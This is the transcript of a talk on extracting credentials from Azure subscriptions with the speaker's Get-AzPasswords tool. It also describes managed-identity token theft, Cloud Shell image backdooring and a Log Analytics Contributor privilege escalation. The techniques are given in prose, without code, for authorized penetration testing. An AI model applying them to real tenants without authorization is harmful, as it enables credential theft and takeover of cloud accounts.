 Welcome to Extracting All the Azure Passwords. I'm Carl Fawson. If we're watching this right now, it means that I've either had some catastrophic issues with my laptop and wasn't able to join the live stream to do this presentation live, but all of the information and slides will be here and we'll still be able to do the presentation and I will join for the Q&A at the end. So please save any of your questions for the questions section that we have at the end, but a little bit of background on myself here. I'm a practice director at a company called NetSpy. I currently lead up our Pacific Northwest team out of Portland, Oregon. Along with that, I lead up our cloud pentesting services where I primarily focus on Azure pentesting as this whole talk's gonna be about Azure and how we can get passwords from it. Kind of makes sense. I'd spend a lot of time doing research there, but I also dabble in other cloud platforms that are out there as well. Spent a little bit of time in AWS, GCP, handful of other cloud providers out there. So I consider myself a bit of a cloud enthusiast in my spare time. Also a cloud enthusiast as a private pilot. I like to fly and try to avoid the clouds myself, but spent some time up in the sky as well. The last thing on my list here is Author. This is a recent edition for me over the last year or so here. I've been co-authoring the Penetration Testing Azure for Ethical Hackers book with David Okioti. We will have that book out in mid-October with packed publishing, but if anybody's interested in pre-ordering, it is out on Amazon right now. So feel free to check it out there. Otherwise you can find me on the Netspy GitHub where we'll be talking about some tools that I've released through the Netspy GitHub. And I blog on the Netspy blog. You can find me on Twitter where I'm usually talking about things that I've contributed to the Netspy blog or to the GitHub. And that's at kfossin for Twitter. So this is a cloud village talk. So I would hope that most folks here understand what Azure is, but for those that are not as familiar with it, it's the cloud provider from Microsoft. And from I guess my perspective and Netspy's perspective, we're seeing lots of our clients move to the Azure cloud for a number of different reasons. The primary driver really being Office 365 services, the integration between on-premise active directory, where lots of clients that we work with are currently in and moving over to Azure active directory, which we'll talk about the structure of that in a few slides here. And then utilizing some of these services that we'll talk about in the talk here to either replicate existing services that they have on an on-premise environment or build cloud native up in Azure as a new application or service that they wanna have up in the cloud. So an important thing that we wanna think about here is that at certain IAM, RBAC role levels within an Azure tenant, be it at Azure Active Directory to subscription, there are passwords in multiple different areas. So typically with contributor rights, we have multiple different services within the Azure subscription that we're able to pull out credentials from and we'll be talking about those different services today. So before we get too far into the services themselves here, just wanna make sure everybody's using kind of the same terminology and understanding the structure of an Azure tenant. So from an Azure Active Directory tenant standpoint, this is kind of the top of the organization for an Azure environment. So the tenant is really that core identity provider within Azure. So for role-based access control and identity and access management, the identities that are stored in Azure Active Directory will have roles applied and those roles allow for access to different subscriptions, services, tenant-level roles that will be applied as well. And in order to apply a role, you have to have a security principle. So principles are made up of a number of different identities within Azure Active Directory. These could be users and or guest users, primary users being users that would either be part of the synced Active Directory environment or just direct on Microsoft managed accounts. And those are accounts that only live in Azure Active Directory. They're not synced down with an AD sync down to an on-premise domain controller. There's some subtle differences between the two, but in general, they're users, they're in Azure Active Directory. We can apply roles to them. Likewise with guest users, those are users that are part of a different tenant for the core of their identity. Those can be added to your tenant as a guest user and provided access to different services through application roles or custom roles, anything like that. For managed identities, we have system assigned and user assigned where system assigned is really more of the resource itself having an identity tied to it versus a user assigned identity, which is more of a subscription level identity that can then be applied to individual resources. They're kind of inverses of each other, but the core of it is you can assign a specific identity to a service. So something like a virtual machine. If we want that virtual machine to be able to have rights within either Azure Active Directory or the subscription to access data or make changes, we would assign an identity to that virtual machine that VM would get the token for that identity and then be able to authenticate to Azure AD or to the subscription itself and access data or make changes. So the last one on here is service principles. These are more of application accounts within an Active Directory tenant. You might be familiar with app registrations within the Azure Active Directory tenant. These are kind of more service type credentials that are utilized by their applications or services as a long-term or potentially long-term credential with a static certificate or password that you could rotate or change over. Typically these are just used for services that are not used for daily interaction with the user and utilized for individual services. So to reiterate with all of these things, these security principles are assigned roles and those roles assign access within the Azure Active Directory tenant. So going one step down here from the tenant down to the individual subscriptions. Subscriptions can be housed within management groups. Management groups can have child management groups. There's subscriptions underneath that. Within the subscription itself, there's resource groups and resources and the application of the roles that we're gonna talk about here can be applied at any of those levels that we see down here on the bottom. So typically in a normal subscription, I would say for the most part, we're seeing roles that are applied at the subscription level or the management group level. If somebody's really, really interested in setting our back and IAM controls around their environment, they'll scope things all the way down to individual resources. But from a practical day-to-day perspective, we're usually just seeing things scope through the subscription or management group for specific users that are either cloud engineers or developers within that subscription or management group that we're working with. So primary roles that we're working with here are owner, contributor, and reader. From our perspective as a pentester, we're often granted reader level access to a subscription as it doesn't allow us to make any changes in the subscription, which could potentially cause an issue, modify existing resources, anything like that. So oftentimes we're initially granted reader level access and try to escalate up to say owner of the subscription or up into Azure Active Directory. So contributors on the subscription allow the user to make changes to the resources themselves in the subscription. Contributor is really what we're seeing for the day-to-day users across the board, people like developers or cloud engineers that are making changes in the environment. Typically it's a subscription level contributor permission that's set so that that user can access everything that is in that subscription. And the only difference between owner and contributor is that owners are allowed to make role assignments within that subscription. So if I'm an owner in the subscription and want to assign another user contributor or reader or another role within that subscription, I have rights to do that. Now roles can be applied at multiple different levels. We talked about the kind of different subscription management group levels. There's also Azure Active Directory tenant level roles that we're not really going to talk about today because they don't necessarily apply to the subscriptions. That's probably a whole other talk. But for the subscription level roles that are applied typically service or application-specific roles that we'll see, we'll talk about a couple of ones that are important for us to use for gathering passwords in a couple of slides here. So for all of the examples that we're going to talk about in the presentation today, just assume that we have contributor on the subscription that we're working with here. Again, typically developers and engineers are going to have this role and it's a very common role that we're going to work with in a subscription. Now some folks are going to say, oh, that's basically admin and you can do everything there. Yeah, it's kind of true. I would say it's on par with say a local admin on a workstation in a traditional Active Directory environment. You've got some power with the specific environment that you're in, say the subscription, but overall you don't have tenant level management. You're not global admin on the Azure Active Directory tenant. You don't have rights to add or remove users or anything like that. It's really just, yeah, I can create a virtual machine or a Key Vault or anything like that. And that's typically what we're seeing in a lot of subscriptions that we work with. Alternatively, there are other roles that you might gain access to during the part of a pen test. So look out for things like website contributor, storage account contributor. We're going to have a very specific log analytics contributor example at the end of the presentation here. But there's multiple different service specific roles that you might be able to make use of to gather credentials from an Azure subscription and we'll cover how we can do that in a minute. So how do we manually access individual credentials? So let's say that we have rights to read credentials for a specific service that we're utilizing in an Azure subscription. Most of the time I would recommend just using the Azure portal. You probably have other options via the CLI or PowerShell to just manually grab individual keys or credentials for kind of one-off collection. We'll go through those for each of the different subscriptions and sorry not subscriptions, resources and services. And for each of those services we'll talk about manual collection and then how we would automate that within GetAzPasswords, which we'll talk about next. So from a manual collection perspective, this is fine if you only have just kind of one-off access to the portal or the CLI or an active session. But from a practical pen tester's perspective we want something that can automate all of this collection. So we wrote GetAzPasswords to automate the collection of passwords out of an Azure subscription. It really wraps the AZ PowerShell functions to automate that collection and just actively and passively gather passwords from different services within a subscription. More the active stuff we'll talk about with things like automation accounts where we have to upload a malicious run book but the passive configuration gathering is usually just one or two lines of PowerShell to say grab a publishing profile from App Services. So if you're interested in microburst we have a number of different functions within the tool set. I've got the link out to the NetSpy GitHub here for microburst, we've talked about all the different functions some other time but there's a lot of different tools within the tool set for enumeration and attacking different services that are in Azure subscriptions. So the first of these services that we'll talk about today is Key Vaults. Now you may be thinking, okay, let's talk about passwords. Key Vaults store passwords, this makes sense. Service is pretty straightforward. It stores credentials and it's used in an Azure subscription to hold secrets, keys, certificates, anything that you would want to protect and keep in a password vault or a Key Vault. So it's a pretty simple service. Manually dumping credentials from this service is also pretty straightforward. You can go into the keys and secrets if you have access to read those and then just manually show the secret value or download a backup copy of the certificate. The portal actually makes it pretty easy to do but this also requires you to have rights to read and list any of those keys or secrets in the access policy. So you can see in the bottom right-hand corner here the add access policy button here. With the Key Vaults, there are individual access policies for the vaults where you can configure individual security principles and set permissions for the Key Vault via the access policy. So instead of just saying, hey, all of the contributors have access to list and read the credentials are stored in the Key Vault, there's an extra step within Azure Key Vaults where you have to add an access policy in order to access those keys and secrets. Just by default, when you create a Key Vault, it's not one of those, oh, hey, everybody has that, it's tied into Azure RBAC. It's one of those things where you have to add the access policy for that. During a PEN test, we may want to modify that access policy temporarily so that we can access the credentials that are in that vault and we definitely want to revert those changes after we're done with that. That is something that you can do. We have functions, and we'll talk about that on the next slide here, that allow you to do that. But it's not a huge impact. It is something that could potentially be logged in the subscription logs themselves and potentially noted as malicious activity. So something to watch out for there. Additionally, access can be restricted by source IP and network, so things like private endpoint connections would restrict where you can actually access the Key Vault from. This is something that we do not have automation built in to get easy passwords for. It's not something that I'd recommend changing something from a private endpoint to a public endpoint is definitely a major state change. I would not recommend doing that. But it may be something to keep in mind as you're trying to get credentials out of those Key Vaults. So from an automation perspective, it's pretty straightforward. With GetAzPasswords, we're utilizing the GetAzKeyVault function from AZ PowerShell to list out all of the Key Vaults. Then for each vault, we want to see what that access policy is up front. If we need to modify it to add, get and list permissions for our user, we can do that. We'll just make a backup of the existing access policies that we can restore to at the very end and then modify the access policy to give ourselves access. Then we get the keys and secrets, return those out to the user through the GetAzPasswords PowerShell function and then return everything back to its original state after we're done. Pretty straightforward, definitely very handy for dumping out Key Vault contents. We can also export certificates to individual files as well. So if you want to get a PFX file for a certificate, GetAzPasswords supports that as well. So the next service that we'll cover is App Services. For those that are not familiar with App Services, at its core, it's really application services that you can use to host web applications and APIs within Azure. So in general, what we're seeing App Services used for primarily function, logic apps, API endpoints and more of your traditional application servers. So from a more traditional on-premise environment, let's say you've got an IAS server and want to ship all of your ASP code up to the cloud, you can make use of Azure App Services to basically be your web server and run all of your application code up in Azure. Super handy from a pentest perspective, we are potentially getting into App Service applications for traditional web application vulnerabilities, some of the most impactful ones being code execution, which is extremely impactful in the first place anyways, regardless of where the application's being hosted. But from a cloud perspective, it potentially allows us to pivot within the cloud environment. So for the App Services themselves, there's frequently passwords stored in configuration files, potentially hard-coded in application configurations or the application files themselves. There's connection strings are associated with the App Service, which we'll see in a moment here. Additionally, function app files were frequently seen configurations there. One of the kind of common things that we run into from a reader perspective is being able to read those function app files and parse it out any hard-coded credentials there. I've quite frequently seen service principle credentials stored there, and we can pull those out to get access to whatever that service principle needs, you know, say from a Key Vault perspective, anything like that. So those are definitely handy. And then there's also App Services configuration service, which can then apply down some of those configurations onto multiple app services and kind of set standard deployments, things like that. That's also an interesting service to dive into. So manually dumping these credentials from an app service application, we can just navigate to the application in the portal, go over to the get publish profile link over on the top right there, and get the publish settings file that we can see here. Now I've redacted all of our user passwords here, but you can see all of the user names are dollar sign Netspy. That's for the Netspy app service application. And, you know, all of the creds here are a bit of an eye chart to look at here, but we've got web credentials, we've got FTP credentials, we've got a number of different credentials that we might be able to utilize as an attacker. So these credentials that we're gonna get out of the publish profile would allow us to access the application from an FTP perspective, which would give us access to application code any configuration files that might be living in the web directory and potentially pull sensitive information out of there, much less getting access to the source code, which could be useful in some way. In addition to that, we have access to web management credentials that would allow us to authenticate to this Kudu environment that we have up on the screen here. Now, typically you would access that through the Azure portal. If you actually go to the SCM link, so in this case we see netspy.scm.azurewebsites.net. If you specify forward slash basic auth on the end of that, it's kind of a neat workaround trick so that you can use those credentials that we identified in that publish profile to access the Kudu interface here. Now, this interface is super handy for just getting access to the application itself. The files that are in there, we can see debug console, process explorer, you can get a PowerShell shell, so you can run commands on the app service itself, and super handy. So from a persistence perspective, I would recommend pulling down published profiles for any apps that you're able to compromise and use that for persistence to keep a presence within that app services application. Finally, the last thing in here is connection string. So by default, if you set a standard connection string for the application to use at the app services resource level, that connection string also gets pulled down with that published profile. So one of the things I want to touch on here if we're able to use that Kudu interface is potentially using app services managed identities. So an app service application that has a managed identity tied to it to access key vaults. So our potential scenario here is let's say we're doing an application pen test against an app services application. We get command execution for some way to pull a token out of the application, and then utilizing that token, we can potentially collect key vault contents as that managed identity. So by hitting the metadata service for that app services application, we're able to pull back a token. We have to get token scoped for the management level and the key vault level. We'll talk about some specifics later here as we go through some of the other content here, but basically you scope out tokens for this and you can use the get AZ key vault keys rest or secrets rest to use the rest APIs to collect those out of the application. So it is super handy because we do frequently see app services being configured with managed identities. Those identities have rights in an access policy and a key vault and key vaults potentially storing sensitive information for the application. So again, this is pretty simple to dump all of this information. We just list out all of the available app services apps and then for each app, we just pull down the publishing profile. We then parse the profiles for any credentials and return those back to the users for get AZ passwords. It's pretty simple. So next up is automation accounts. It's one of my personal favorites within Azure here, but for automation accounts, you've got a service that basically runs serverless code for you to automate management and other certain tasks that you would want to handle within an Azure subscription. We're seeing automation accounts do all sorts of different things in subscriptions that we're dealing with, but primarily we see things like virtual machines being spun up or spun down in the Azure environment for things like cost management or for update management applying updates to any machines that need updates in that Azure virtual machine infrastructure. So there's a lot of other things that you can integrate automation accounts to do, but in order to utilize the automation accounts to do things in the subscription, frequently we'll run into credentials that are tied to the automation account itself. So these can either be clear text credentials that end up hard coded in a run book. This is bad, not a good practice, but we do frequently run into it. As a reader, we can potentially read those run books with read-only access and get those credentials out of there. Platform level stored credentials, these are stored credentials that are in the automation account itself at the cloud platform level. There's a section called credentials where you can store credentials in the automation account and then run as accounts that are tied to the automation account itself. So as an owner of a subscription, we can set an app registration that is tied to the automation account itself. Now, this application or I guess service principle is then used as a run as account and that authenticates within the Azure Run Book itself. With a certificate, we can actually access and extract that credential using a run book and we'll show how we can do that in just a minute here. That's super handy as the run as accounts are typically set up as a contributor or at least as a default configuration, the run as account is a contributor on the subscription. And then from a Key Vaults perspective, if any Key Vaults are being called from the automation account, typically being used with run as accounts, we can potentially use that run as account to access the Key Vaults. We'll talk about that on the side here. So doing the password dumping manually here, we can utilize run books themselves. We can view the run books very simply by hitting the view button and reviewing the source for the run books. Very, very simple here. Then actually pulling out these stored credentials, we have to get a little bit more complicated with our PowerShell code here. So we can see in the screenshot here that we have two different sections for pulling out credentials. The top one is for these stored credentials at the platform level. The bottom is for the run as certificates. Now, we don't need to go line by line, but the core of it is the top section here. We get the credential, we cast that out to a username and password variable and then write that out to the output of the run book. From a kind of manual perspective, definitely recommend just running this in the test pane itself. If you've got contributor rights and the ability to write a run book, I would just write a temporary run book, run that in the test pane, which we'll see in the next slide here and look at the output there. Some of that will be logged within the logs itself, but it won't be run as a job, so the output won't be stored in job. So it's a little bit more stealthy there. With the run as certificate extraction here, that's something we really don't need to dive too deep into here, but essentially we get the certificate associated with the run as account. We export that to a PFX file, go base 64 and then you can take that base 64 and write that back out to a file on your end and then later use that for authentication as the app registration tied to that run as account. So in the test pane here, we can see up at the top, we had test test as a credential and we can see the MII or the start of the base 64 certificate there out in the test pane. Now, from a practicality standpoint, you're probably looking at this and going, oh, I don't wanna have to manually put in a run book like this and deal with all of this. So we've automated this within GetAZPasswords and also protected those credentials as we'll see in a moment. So as I mentioned, protecting the credentials here, if we were to run an automation account, run book and export usernames, passwords, anything sensitive from that automation account that could potentially be dumped out in ClearText in the output for the automation account job. So we run that run book, you got ClearText credentials in the output, someone with reader permissions could read that job's output and potentially get access to credentials they shouldn't have access to. So as a pen tester, we don't want to leave an environment worse than we showed up to it. So we wanna make sure that we're protecting that data in the output. Doesn't necessarily apply for the test pane as we talked about earlier. So what we're gonna do is encrypt that output with a certificate so that we don't have to worry about leaving ClearText credentials in the output. So from a microburst perspective, we just generate a cert locally, upload that with malicious run books and then decrypt everything when it comes back down client side. So one of the things I wanted to kind of touch on here that's kind of similar to what we talked about in the app services section is utilizing the run as accounts to get access to Key Vault. So in a very similar method to what we talked about manage identities with app services, we can use the run as accounts that may have Key Vault permissions to read keys and secrets out of a Key Vault. We've written automation into microburst with the get AZ Key Vaults automation to upload a malicious automation account run book that then lists all of the Key Vaults and pulls out any available keys, certificates, anything like that from the Key Vaults. This was technically addressed by Microsoft by a CDE. There were some default configurations associated with that. We put out a blog post related to that that kind of goes into more detail, explains all of that stuff, but we don't need to cover that here. So something to keep in mind as you get access to automation accounts is you may be able to hit Key Vaults from that automation account. So doing this with easy PowerShell, certainly easier, but this is one of those more active gatherings of credentials. It's not like we're pulling down a single configuration here. We're actually actively running run books in the automation account to pull out credentials. So for each of the automation accounts, we're just gonna list out the available credentials, the connections, or run as accounts, and then upload malicious run books typically with the get AZ passwords. We have everything randomly named for the run books. So it'll be pretty easy to identify which run books are ours and that way we don't have to worry about conflicts with naming or getting confused with which run book we're running in the subscription itself. Get the output from the job output, delete the run books from the automation account, and then create a local authentication script to utilize the run as certificates, which we'll kind of see at the end of the demo here. One quick note about running get AZ passwords for automation accounts is avoid hitting Control C to stop the PowerShell function midway through dumping credentials for automation accounts as we're uploading these run books to the automation account. If we stop the function before we're able to delete the run book, you end up having kind of orphaned run books up in the automation account that we need to go back and clean up after the fact. Again, we don't wanna leave the environment worse than we started. So we wanna make sure that we're cleaning up after ourselves in the automation accounts. If your computer crashes or something else happens, there's nothing that you can really do about that at that point, otherwise go in and manually delete the run books at that point. But something to look out for because I've definitely had that problem in the past when I thought, this run book's never gonna end and I've spent plenty of time waiting for those run books to complete. So something to look out for there. So moving on to storage accounts. Storage accounts are pretty simply named as for what they do, but they're a file storage service in the Azure cloud. There's multiple different types of files and kind of areas that we have within the storage accounts themselves, but at a high level, we've got storage account keys that gain or allow us to gain access to the storage accounts themselves through things like the Azure Storage Explorer. And underneath that, we can access other things like files, queues, tables, blob storage, anything like that. In addition to that, files themselves that are stored within the storage accounts may potentially contain credentials. So with access to a storage account, you may be able to pull out configuration files or read other sensitive information that might be in that storage account. And this isn't really easy to automate and pull credentials out of, so we'd recommend manually doing that just anyways. Typically requires contributor access to actually get access to the files themselves. This kind of breaks down to the data plane, management plane permissions and accessing the storage account keys, but we don't need to dive too deep into that. In terms of getting access to the storage account keys to actually load up something like Azure Storage Explorer to gain access to the storage account, they're available in the portal. They're also really easy to rotate. So if they're ever compromised or you just want to regularly rotate the key, it's just that simple recycle button down there to rotate the key. So one thing to note about storage accounts is that they are used by Cloud Shell. And we've got a blog post link down on the bottom here that really talks about all of these specifics about this attack. But if you're utilizing Cloud Shell within Azure, there is potential that anyone with contributor access to the storage account associated with the Cloud Shell could potentially overwrite the image files that are mounted up in Cloud Shell to potentially run commands and gain access to another account within the subscription. So if we have a local admin that's utilizing Cloud Shell and another user who is a contributor on that same subscription where the Cloud Shell files being stored for that global admin, that other contributor could potentially get access to the Cloud Shell for a global administrator. Now there's restrictions you can put in place to help protect those Cloud Shell files. Microsoft has some good recommendations as to how you can lock those down. But in general, we kind of recommend against using privileged accounts with Cloud Shell as that could potentially allow for privilege escalation. So the process for that's pretty straightforward. You get access to the IMG file for the Cloud Shell itself, modify both Bash and PowerShell startup files. I would recommend doing both because you don't know necessarily which Cloud Shell a user is gonna be using. And once those startup files are modified, you re-upload that to the file shared that hosts the Cloud Shell files. And then the next time that Cloud Shell is opened up, commands are executed as that victim user. So it's not necessarily the most practical attack in the book, it does take a lot of time to download that five gigabyte file to modify that IMG file. It's not a guarantee that that privileged account is going to log in with Cloud Shell. You can potentially fish somebody with a link for the Cloud Shell URL and get them to go visit the Cloud Shell. It is a legitimate link. And the second that they open that up that starts kicking off those startup scripts. So you might have some luck there, but mileage may vary. Other recommendation there is those IMG files potentially contain sensitive files that maybe there's a setup script that's stored within Cloud Shell for that user. Definitely take a look at those files as well as you might be able to pull out credentials there. So back to actually pulling passwords out of the service itself, it's basically 10 lines in GetAZPassword. That's even being generous. If I got rid of some extra line spaces or anything like that, we could probably cut it down to like three or four lines. But you get the list of storage accounts and then for each account, get the key. Two commands, very simple. It's really easy to take a look at and GetAZPasswords. So the next thing that we want to cover is Azure Container Registries. So this service specifically stores container images for container-related services in Azure. Technically, you could use the container registry outside of Azure itself for storing container images for anything that you might utilize images for. But in general, we mostly see Azure registries tied into things like AKS or individual container instances up in Azure. From a password's perspective, you could find credentials in the container images themselves. As a reader on the subscription, you should be able to pull down any of the container images and then parse those four credentials. It seems like a weird ability to have as a reader. You're actually able to connect with Docker up to the registry, list out, pull down any of the available images. And we frequently see images containing credentials, service principle, passwords or certificates, all sorts of different things that could be utilized by the container itself to act in the active directory tenant or within the subscription itself. So definitely look at those images if you've at a minimum got reader access to an ACR. Additionally, there are ACR admin credentials that can be exported for more of a kind of persistence perspective or for just being an admin of the container registry. So we can see in the screenshot here, we've got a registry named NetSpy, we've enabled the admin user, we set the username to NetSpy, and we have passwords for that. Those are long gone, so don't worry about trying to authenticate to those, anybody trying that. But in terms of trying to automate this, it's not super easy to automate the pulling down containers and manually or I guess automatically parsing those container images for any available credentials. But as we talked about that only requires reader. For an automation standpoint for the ACR credentials, there are specific commands to do that and it's very simple. Alternatively, these are available in the portal. So much like storage accounts here, it's a very straightforward get the list and for each of the registries in the list, get the credentials for it. So one of the supported services, I guess through the container registries is AKS or Azure Kubernetes Services. And this can contain passwords in a couple of different spots that we'll go over today. So the services itself runs container images within Azure in a Kubernetes cluster that gets spun up underneath the AKS service. Passwords could be in the virtual machines that support the clusters themselves. We'll talk about how we can extract those out of the clusters in a minute here, because that's a fairly active process. It's just not a manual grab something and get the credentials. So we can either get service print, service principle credentials with that in clear text or a managed identity token that we can utilize elsewhere with the REST APIs. Additionally, AKS admin credentials can be exported for persistence from say a CUBE CTL type perspective so that we can run commands on the clusters after the fact, be able to manage the AKS clusters with that as well. So doing this manually is kind of a pain either for trying to get the credentials out of the cluster itself or the CUBE config files. One kind of handy trick for this that I wanted to make mention of since we talked about Cloud Shell previously is if you do have access to either the Cloud Shell files for another user or access to a Cloud Shell itself and contributor level access, you can actually use the get credentials command with the AZ CLI to get that CUBE config file here and then just cat that out from the Cloud Shell and then copy that off to another system to utilize for accessing the cluster there. If you use the dash dash admin flag for that command that we see in the screenshot at the top, you can get the cluster admin credentials. It's not the easiest thing to do. It's kind of a pain and it takes a couple of extra steps. I honestly just recommend using get AZ passwords if the CUBE config files are what you're going after here, but it is an option if that's something you wanna do. So from an automation perspective, we can utilize the get AZ AKS cluster command to list out all of the clusters and then for each of those clusters, we actually need to use the REST APIs themselves to get the CUBE config files that we just talked about. There's not really good support within the AZ PowerShell Command Blitz to pull out those configuration files. The easiest way that I found was actually just to use the get AZ access token from the AZ PowerShell Command Blitz to pull down a REST API token to then just reach out to the REST APIs and grab those CUBE config files. So it's kind of branching out of our standard practice with the get AZ passwords where we're not strictly just using the AZ PowerShell Command Blitz but kind of using them and using the REST APIs as well. So if the cluster itself is configured with a service principle, we can actually access those clear text credentials in the azure.json file under the etsy Kubernetes folder. And that one's really interesting. So with the cluster itself, there are virtual machine scale sets that support that cluster. Those are created into a special resource group that's named after the cluster itself and the resource group that the cluster is deployed into. But it's pretty easy to identify that from the AZ PowerShell Command Blitz and identify where that virtual machine scale set is. So by using the run command feature for the virtual machine scale set, we can just issue a cat command for the azure.json file, read out those clear text credentials in the output of that and then get access to the service principle credentials. Alternatively, if that cluster is utilizing a managed identity instead, we can use the metadata service from the cluster and using that same AZVMSS VM run command, we can ping the metadata service, get back a managed identity token and then start going from there. So a quick demo here, we have a recording for a recording, but we can see up at the top here, we've imported the microburst modules that include the get AZ passwords function. We recommend using the verbose flag here and we're also using modify policies and export certificates so that we'll modify any Key Vault policies that we need to modify to gain access to a Key Vault and then any certificates that are in the Key Vault will write out two PFX files in the directory that we're running the function from. So we can see that we're getting Key Vault items here, app services, configurations, container registry credentials, storage account keys, automation accounts are running the run as certificate gathering. Let's see here, what else? Cosmos DB, which we didn't really talk about, but that one's super basic. We don't need to dive too far in depth. We can see here, we've got a PFX file along with the Azure run as connection PS1 file that we can use to authenticate as that run as account and we exported all of this to out grid view. I either recommend using this or outputting everything to an exported CSV within PowerShell so that you have a little bit more persistent file storage of those credentials if you need that. But outputting them out to grid view here is also pretty handy for just kind of quick review of all of the credentials we have access to. So we kind of scroll through the top ones pretty quick here but we've got all of the credentials that we talked about during the slides here and as we're starting up the demo here, important things down here at the bottom, we've got the AKS cluster service principle where you can see the client secret. It's a little truncated here, but we have the client ID that's tied to that as well so you can authenticate as that service principle and a handful of other credentials. So this entire environment has been burned down so none of these credentials should work. So no need trying them, but after I recorded this recording here, immediately deleted everything in that subscription and changed any existing or deleted any existing credentials like the service principle. So final note here, now that we understand how to utilize get AZ passwords, wanted to talk about a privilege escalation opportunity that's in one of the Azure default roles. So the log analytics contributor role is something that we frequently see for users that need access to the log analytics workspaces and need to say modify any parsing of those log analytics items, allows you to read monitoring data, edit monitoring settings, anything like that. So as part of that, the role itself has automation account star permissions for the actions on wherever it's applied. We typically see this applied at the subscription level. So one thing to keep in mind with the automation accounts is by default, those run as accounts are contributors on the subscription and as a log analytics contributor, it's a slightly limited contributor role. So it's really more focused on the log analytics services. And we see here things like virtual machine extensions, you have some options there, you can list keys for storage accounts, but it's not necessarily full contributor rights that you would typically see for a contributor. So using that log analytics contributor role, we can use the automation account functionality that we talked about earlier to get access to that contributor run as account. Now it's kind of a minor escalation here, but it does allow you to move from log analytics contributor up to full subscription level contributor. Microsoft actually recently addressed this in their documentation. They intend on removing the automation account rights for the log analytics contributor role. I actually recommend utilizing a custom role to basically apply any permissions that you might need to for specific users in that subscription. So once we do have that run as certificate, we can then authenticate as that full contributor as the run as account. And that can be super handy to potentially escalate privileges here. So given that it's not fully addressed in the role yet, I assume that it might be viable for a little bit longer here, but I'm guessing that Microsoft's gonna fully remove those rights relatively soon here. So something to keep an eye out for. So while we do questions here, this is a recording, but we'll leave the information slide up at the end here. Before we get to the questions here, just wanted to do a couple of thanks here for the microburst contributors. Jake, Josh, Thomas, we've had a handful of people that have contributed to the microburst tool set. I want to say thanks to all of those folks and their contributions. We've talked about several of the functions they've all helped out on earlier here. And slide design assistance from Sophia, and that's by thank you for the microburst with a knife. I really like that. And then for that basic auth kind of login hack for app services, MCOMI on Twitter, same person that does StormSpotter, definitely go check that out. And yeah, thanks everybody. So here's some additional information here we'll leave that up during the questions hopefully. And if you want to access microburst, we've got the link here, then that's my blogs also available and some specific get AZ passwords blogs. These slides themselves will be linked out for my Twitter. I'll most likely host those up in Azure as a PDF. Thanks.